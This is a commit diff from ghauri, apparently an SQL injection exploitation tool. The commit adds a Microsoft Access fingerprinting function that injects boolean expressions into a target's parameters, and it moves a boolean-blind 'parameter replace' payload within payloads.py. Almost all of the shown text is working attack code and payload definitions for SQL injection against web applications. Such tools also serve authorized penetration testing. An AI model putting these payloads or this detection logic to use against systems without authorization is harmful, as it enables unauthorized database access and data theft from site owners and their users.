STRLCPY/ghauri

added fingerprint backend DBMS in case of MS ACCESS boolean based injection.. improved code quality..
r0oth3x49 committed 1 year ago

2b97bf0a

1 parent 095b2abf

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

ghauri/common/payloads.py

		skipped 190 lines
191	191		"dbms": "",
192	192		},
193	193		{
194		-	"payload": "(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT 09567 UNION SELECT 08652) END))",
195		-	"comments": [
196		-	{"pref": "", "suf": ""},
197		-	{"pref": "NULL AND 09854=", "suf": "-- wXyW"},
198		-	{"pref": "NULL OR 06387=", "suf": "-- wXyW"},
199		-	],
200		-	"title": "Boolean-based blind - Parameter replace (original value)",
201		-	"vector": "(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT 09567 UNION SELECT 08652) END))",
202		-	"dbms": "",
203		-	},
204		-	{
205	194		"payload": "OR NOT [RANDNUM]=[RANDNUM]",
206	195		"comments": [
207	196		{"pref": " ", "suf": ""},
		skipped 41 lines
249	238		],
250	239		"title": "OR boolean-based blind - WHERE or HAVING clause",
251	240		"vector": "OR [INFERENCE]",
	241	+	"dbms": "",
	242	+	},
	243	+	{
	244	+	"payload": "(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT 09567 UNION SELECT 08652) END))",
	245	+	"comments": [
	246	+	{"pref": "", "suf": ""},
	247	+	# {"pref": "NULL AND 09854=", "suf": "-- wXyW"},
	248	+	# {"pref": "NULL OR 06387=", "suf": "-- wXyW"},
	249	+	],
	250	+	"title": "Boolean-based blind - Parameter replace (original value)",
	251	+	"vector": "(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT 09567 UNION SELECT 08652) END))",
252	252		"dbms": "",
253	253		},
254	254		{
		skipped 1798 lines

■ ■ ■ ■ ■ ■

ghauri/common/utils.py

		skipped 371 lines
372	372		re.sub(r"[^a-zA-Z0-9\.\s]+", " ", response_01[j1:j2]).lstrip().rstrip(),
373	373		)
374	374		if len(new) >= 2 and len(old) >= 2 and len(new) <= 20 and len(old) <= 20:
375		-	# logger.debug(
376		-	# "{:7} response[{}:{}] --> response_01[{}:{}] {!r:>8} --> {!r}".format(
377		-	# tag, i1, i2, j1, j2, new, old
378		-	# )
379		-	# )
	375	+	logger.debug(
	376	+	"{:7} string[{}:{}] --> not_string[{}:{}] {!r:>8} --> {!r}".format(
	377	+	tag, i1, i2, j1, j2, new, old
	378	+	)
	379	+	)
380	380		_temp.append(
381	381		{
382	382		"string": f"{response[i1:i2]}",
		skipped 929 lines
1312	1312		# f" both prefix and suffix are found for injection.. '{prefix}', '{suffix}'"
1313	1313		# )
1314	1314		# logger.debug("checking payloads for provided prefix and suffix..")
1315		-	for entry in payloads:
1316		-	_pref = entry.prefix
1317		-	prefix = urldecode(prefix)
1318		-	if _pref and prefix and prefix[0] == _pref[0]:
1319		-	_temp.append(entry)
1320		-	if not _temp:
1321		-	payload = payloads[-1].raw
1322		-	if prefix and prefix[-1] in [")", "'", '"']:
1323		-	prefix += " "
1324		-	_temp = [
1325		-	Payload(
1326		-	prefix=prefix,
1327		-	suffix=suffix,
1328		-	string=f"{prefix}{payload}{suffix}",
1329		-	raw=payload,
1330		-	)
1331		-	]
	1315	+	# for entry in payloads:
	1316	+	# _pref = entry.prefix
	1317	+	# prefix = urldecode(prefix)
	1318	+	# if _pref and prefix and prefix[0] == _pref[0]:
	1319	+	# _temp.append(entry)
	1320	+	# if not _temp:
	1321	+	payload = payloads[-1].raw
	1322	+	if prefix and prefix[-1] in [")", "'", '"']:
	1323	+	prefix += " "
	1324	+	_temp = [
	1325	+	Payload(
	1326	+	prefix=prefix,
	1327	+	suffix=suffix,
	1328	+	string=f"{prefix}{payload}{suffix}",
	1329	+	raw=payload,
	1330	+	)
	1331	+	]
1332	1332		return _temp
1333	1333
1334	1334
		skipped 450 lines

■ ■ ■ ■ ■ ■

ghauri/core/tests.py

		skipped 253 lines
254	254		response = inj.check_mssql()
255	255		if backend == "PostgreSQL":
256	256		response = inj.check_postgre()
	257	+	if backend == "Microsoft Access":
	258	+	response = inj.check_access()
257	259		if not response:
258	260		response = inj.check_oracle()
259	261		if not response:
		skipped 449 lines
709	711		response_dbms = inj.check_mssql(heuristic_backend_check=True)
710	712		if not response_dbms:
711	713		response_dbms = inj.check_postgre(heuristic_backend_check=True)
	714	+	if not response_dbms:
	715	+	response_dbms = inj.check_access(heuristic_backend_check=True)
712	716		if response_dbms:
713	717		backend = response_dbms
714	718		if not response_dbms:
		skipped 843 lines
1558	1562		title = entry.get("title")
1559	1563		vector = entry.get("vector")
1560	1564		backend = entry.get("backend")
1561		-	if not possible_dbms:
1562		-	possible_dbms = backend
	1565	+	# if not possible_dbms:
	1566	+	# possible_dbms = backend
1563	1567		if payload_type == "boolean-based blind":
1564	1568		vectors.update({"boolean_vector": vector})
1565	1569		logger.debug(
		skipped 791 lines

■ ■ ■ ■ ■ ■

ghauri/dbms/fingerprint.py

		skipped 212 lines
213	213		_temp = "MySQL"
214	214		return _temp
215	215
	216	+	def check_access(self, heuristic_backend_check=False):
	217	+	_temp = ""
	218	+	if heuristic_backend_check:
	219	+	attack = self.check_boolean_expression(expression="VAL(CVAR(1))=1")
	220	+	attack01 = self.check_boolean_expression(
	221	+	expression=quote(
	222	+	"IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0",
	223	+	)
	224	+	)
	225	+	bool_retval = check_boolean_responses(
	226	+	self.base,
	227	+	attack,
	228	+	attack01,
	229	+	match_string=self.match_string,
	230	+	not_match_string=self.not_match_string,
	231	+	code=self.code,
	232	+	text_only=self.text_only,
	233	+	)
	234	+	result = bool_retval.vulnerable
	235	+	if result:
	236	+	is_ok = False
	237	+	if self._attacks:
	238	+	t0, f0 = self._attacks[0].status_code, self._attacks[-1].status_code
	239	+	t1, f1 = attack.status_code, attack01.status_code
	240	+	r0, r1 = self._attacks[0].redirected, attack.redirected
	241	+	is_ok = bool(t0 == t1 and f0 == f1 and r0 == r1)
	242	+	if is_ok:
	243	+	message = f"heuristic (extended) test shows that the back-end DBMS could be '{mc}Microsoft Access{nc}'"
	244	+	logger.notice(message)
	245	+	_temp = "Microsoft Access"
	246	+	else:
	247	+	logger.info(f"testing Microsoft Access")
	248	+	attack = self.check_boolean_expression(expression="VAL(CVAR(1))=1")
	249	+	bool_retval = check_boolean_responses(
	250	+	self.base,
	251	+	attack,
	252	+	self.attack01,
	253	+	match_string=self.match_string,
	254	+	not_match_string=self.not_match_string,
	255	+	code=self.code,
	256	+	text_only=self.text_only,
	257	+	)
	258	+	result = bool_retval.vulnerable
	259	+	ok = False
	260	+	if result:
	261	+	logger.info(f"confirming Microsoft Access")
	262	+	attack = self.check_boolean_expression(
	263	+	expression="IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0"
	264	+	)
	265	+	bool_retval = check_boolean_responses(
	266	+	self.base,
	267	+	attack,
	268	+	self.attack01,
	269	+	match_string=self.match_string,
	270	+	not_match_string=self.not_match_string,
	271	+	code=self.code,
	272	+	text_only=self.text_only,
	273	+	)
	274	+	result = bool_retval.vulnerable
	275	+	if not result:
	276	+	warnMsg = "the back-end DBMS is not Microsoft Access"
	277	+	logger.warning(warnMsg)
	278	+	ok = False
	279	+	return ""
	280	+	if result:
	281	+	ok = True
	282	+	else:
	283	+	warnMsg = "the back-end DBMS is not Microsoft Access"
	284	+	logger.warning(warnMsg)
	285	+	ok = False
	286	+	return ""
	287	+	if ok:
	288	+	logger.notice("the back-end DBMS is Microsoft Access")
	289	+	if ok:
	290	+	_temp = "Microsoft Access"
	291	+	return _temp
	292	+
216	293		def check_mssql(self, heuristic_backend_check=False):
217	294		_temp = ""
218	295		db_version = ""
		skipped 281 lines

added fingerprint backend DBMS in case of MS ACCESS boolean based injection.. improved code quality..